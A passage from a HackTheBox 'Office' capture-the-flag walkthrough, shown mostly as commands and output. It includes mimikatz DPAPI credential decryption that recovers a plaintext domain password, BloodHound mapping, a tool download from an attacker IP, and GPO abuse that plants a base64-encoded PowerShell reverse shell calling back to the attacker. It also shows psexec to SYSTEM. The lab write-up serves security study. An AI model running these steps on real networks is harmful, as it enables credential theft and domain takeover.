[domainkey] with RPC
[DC] 'office.htb' will be the domain
[DC] 'DC.office.htb' will be the DC server
  key : 3f891c81971ccacb02123a9dde170eaae918026ccc0a305b221d3582de4add84c900ae79f950132e4a70b0ef49dea6907b4f319c5dd10f60cc31cb1e3bc33024
  sha1: fbab11cacdd8407e8db9604f0f8c92178bee6fd3
...
mimikatz # dpapi::masterkey /in:.\191d3f9d-7959-4b4d-a520-a444853c47eb /rpc
...
[domainkey] with RPC
[DC] 'office.htb' will be the domain
[DC] 'DC.office.htb' will be the DC server
  key : 87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166
  sha1: 85285eb368befb1670633b05ce58ca4d75c73c77
...
mimikatz # dpapi::masterkey /in:.\44383fc6-6086-474c-9c42-608f07bb2a75 /rpc
[domainkey] with RPC
[DC] 'office.htb' will be the domain
[DC] 'DC.office.htb' will be the DC server
  key : d74394f087e83344b0afc1d9a103218ea1b42079663da47ee90475131dd0c5e4b70da680213ea810dae655512e8c823c727e07489f35675bb5c26b4d260e4d6a
  sha1: ff18a9e2a3685e3df6b45f13fc94a3959094110a
...
mimikatz # dpapi::cache

CREDENTIALS cache
=================

MASTERKEYS cache
================
GUID:{10811601-0fa9-43c2-97e5-9bef8471fc7d};KeyHash:fbab11cacdd8407e8db9604f0f8c92178bee6fd3;Key:available
GUID:{44383fc6-6086-474c-9c42-608f07bb2a75};KeyHash:ff18a9e2a3685e3df6b45f13fc94a3959094110a;Key:available

DOMAINKEYS cache
================
mimikatz # dpapi::cred /in:C:\Users\PPotts\appdata\Roaming\Microsoft\Credentials\84F1CAEEBF466550F4967858F9353FB4
...
Decrypting Credential:
 * volatile cache: GUID:{191d3f9d-7959-4b4d-a520-a444853c47eb};KeyHash:85285eb368befb1670633b05ce58ca4d75c73c77;Key:available
**CREDENTIAL**
  credFlags      : 00000030 - 48
  credSize       : 000000be - 190
  credUnk0       : 00000000 - 0

  Type           : 00000002 - 2 - domain_password
  Flags          : 00000000 - 0
  LastWritten    : 5/9/2023 11:03:21 PM
  unkFlagsOrSize : 00000018 - 24
  Persist        : 00000003 - 3 - enterprise
  AttributeCount : 00000000 - 0
  unk0           : 00000000 - 0
  unk1           : 00000000 - 0
  TargetName     : Domain:interactive=OFFICE\HHogan
  UnkData        : (null)
  Comment        : (null)
  TargetAlias    : (null)
  UserName       : OFFICE\HHogan
  CredentialBlob : H4ppyFtW183#
  Attributes     : 0

Creds: hhogan:H4ppyFtW183#

TLDR;

Find master keys
Inject master keys via /rpc
If lucky it will get decrypted and will be in cache
Dump creds file for credentials

-- Turns out if user is logged in then we are indeed "Lucky"!

Privilege Escalation (system)

└─$ netexec winrm office.htb -u 'hhogan' -p 'H4ppyFtW183#'
WINRM       10.10.11.3      5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:office.htb)
WINRM       10.10.11.3      5985   DC               [+] office.htb\hhogan:H4ppyFtW183# (Pwn3d!)
└─$ evil-winrm -i office.htb -u 'hhogan' -p 'H4ppyFtW183#'
Evil-WinRM shell v3.5
*Evil-WinRM* PS C:\Users\HHogan> whoami /all
User Name     SID
============= =============================================
office\hhogan S-1-5-21-1199398058-4196589450-691661856-1108

Group Name                                  Type             SID                                           Attributes
=========================================== ================ ============================================= ==================================================
Everyone                                    Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access     Alias            S-1-5-32-574                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
OFFICE\GPO Managers                         Group            S-1-5-21-1199398058-4196589450-691661856-1117 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Kerberos support for Dynamic Access Control on this device has been disabled.

Start bloodhound to get idea of AD and maybe pwn GPO

└─$ sudo neo4j console
---
└─$ bloodhound
---
└─$ bloodhound-python -u hhogan -p "H4ppyFtW183#" -d office.htb -ns 10.10.11.3 -c all

Show all users: MATCH (u: User) RETURN u

User > Outbound Object Control > Transitive Object Control.

The user has GenericWrite permission on domain policies.

Policy affects the domain controller

GPO Abuse

Get group policy related commands:

*Evil-WinRM* PS C:\Users\HHogan\Documents> Get-Command -Module GroupPolicy -Verb Get

CommandType     Name                                               Version    Source
-----------     ----                                               -------    ------
Alias           Get-GPPermissions                                  1.0.0.0    GroupPolicy
Cmdlet          Get-GPInheritance                                  1.0.0.0    GroupPolicy
Cmdlet          Get-GPO                                            1.0.0.0    GroupPolicy
Cmdlet          Get-GPOReport                                      1.0.0.0    GroupPolicy
Cmdlet          Get-GPPermission                                   1.0.0.0    GroupPolicy
Cmdlet          Get-GPPrefRegistryValue                            1.0.0.0    GroupPolicy
Cmdlet          Get-GPRegistryValue                                1.0.0.0    GroupPolicy
Cmdlet          Get-GPResultantSetOfPolicy                         1.0.0.0    GroupPolicy
Cmdlet          Get-GPStarterGPO                                   1.0.0.0    GroupPolicy

Get-GPO -All can be used to view all the policies.

*Evil-WinRM* PS C:\Users\HHogan\AppData\Local\Temp> Get-GPO -All | Select DisplayName

DisplayName
-----------
Windows Firewall GPO
Default Domain Policy
Default Active Directory Settings GPO
Default Domain Controllers Policy
Windows Update GPO
Windows Update Domain Policy
Software Installation GPO
Password Policy GPO

We can use SharpGPOAbuse.exe to get administrator access:

*Evil-WinRM* PS C:\users> cd $ENV:TEMP
*Evil-WinRM* PS C:\Users\HHogan\AppData\Local\Temp> iwr 10.10.16.75/SharpGPOAbuse.exe -outfile sa.exe
# *Evil-WinRM* PS C:\Users\HHogan\AppData\Local\Temp> .\sa.exe --AddComputerTask --TaskName "Install Updates" --Author hhogan --Command "cmd.exe" --Arguments "/c net localgroup administrators hhogan /add" --GPOName "Default Domain Policy"
*Evil-WinRM* PS C:\Users\HHogan\AppData\Local\Temp> .\sa.exe --AddComputerTask --TaskName "Install Updates" --Author hhogan --Command "cmd.exe" --Arguments "/c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANwA1ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==" --GPOName "Default Domain Policy"
[+] Domain = office.htb
[+] Domain Controller = DC.office.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=office,DC=htb
[+] GUID of "Default Domain Policy" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] Creating file \\office.htb\SysVol\office.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.
[+] Done!
*Evil-WinRM* PS C:\Users\HHogan\AppData\Local\Temp> gpupdate /force
Updating policy...
Computer Policy update has completed successfully.
User Policy update has completed successfully.
---
PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32> cd \users\administrator
PS C:\users\administrator> tree /f /a
Folder PATH listing
Volume serial number is C626-9388
C:.
+---.ssh
|       known_hosts
|
+---3D Objects
+---Contacts
+---Desktop
|       root.txt
|
+---Documents
+---Downloads
+---Favorites
|   |   Bing.url
|   |
|   \---Links
+---Links
|       Desktop.lnk
|       Downloads.lnk
|
+---Music
|       cleanup_gpo_abuse.ps1
|       joomla.zip
|
+---OneDrive
+---Pictures
+---Saved Games
+---Searches
|       winrt--{S-1-5-21-1199398058-4196589450-691661856-500}-.searchconnector-ms
|
\---Videos

The original idea with Privilege Escalation was to add user to admin group and that's it, pwned. But since it's htb box has a cleanup script and doesn't let us do it.

PS C:\users\administrator> cat music\clean*
# Removing all users from administrative groups

net localgroup administrators hhogan /del
net localgroup administrators tstark /del
net localgroup administrators ppotts /del

net localgroup "domain admins" hhogan /del
net localgroup "domain admins" tstark /del
net localgroup "domain admins" ppotts /del

# Cleaning Scheduled Tasks
cd "\\office.htb\SysVol\office.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE"
Remove-Item -Recurse -Force -Path .\Preferences\

cd "\\office.htb\SysVol\office.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE"
Remove-Item -Recurse -Force -Path .\Preferences\

Root.txt

Anyway, get the flag via reverse shell.

PS C:\users\administrator> cat desktop/root.txt
23a4b810701b817fef0ca93e59bab3fc

psexec could also have been used for privilege escalation:

┌──(root㉿kali)-[/home/h4x0r3rr0r]
└─# impacket-psexec HHogan:H4ppyFtW183#@10.10.11.3
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Requesting shares on 10.10.11.3.....
[*] Found writable share ADMIN$
[*] Uploading file aYcaByTC.exe
[*] Opening SVCManager on 10.10.11.3.....
[*] Creating service zwBc on 10.10.11.3.....
[*] Starting service zwBc.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.2322]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

Credits: h4x0r3rr0r

PreviousJAB NextPerfection

Last updated 7 months ago

hashtagRecon

hashtagDNS (53)

hashtagHTTP (80)

hashtagJoomla Credentials

hashtagKerbrute

hashtagRID Brute

hashtagSMB

hashtagPCAP Analysis

hashtagJoomla

hashtagReverse Shell (web_account)

hashtagPrivilege Escalation (tstark)

hashtagUser.txt

hashtagPrivilege Escalation (ppotts)

hashtagHTTP (8083)

hashtagPrivilege Escalation (hhogan)

hashtagDPAPI

hashtagPrivilege Escalation (system)

hashtagGPO Abuse

hashtagRoot.txt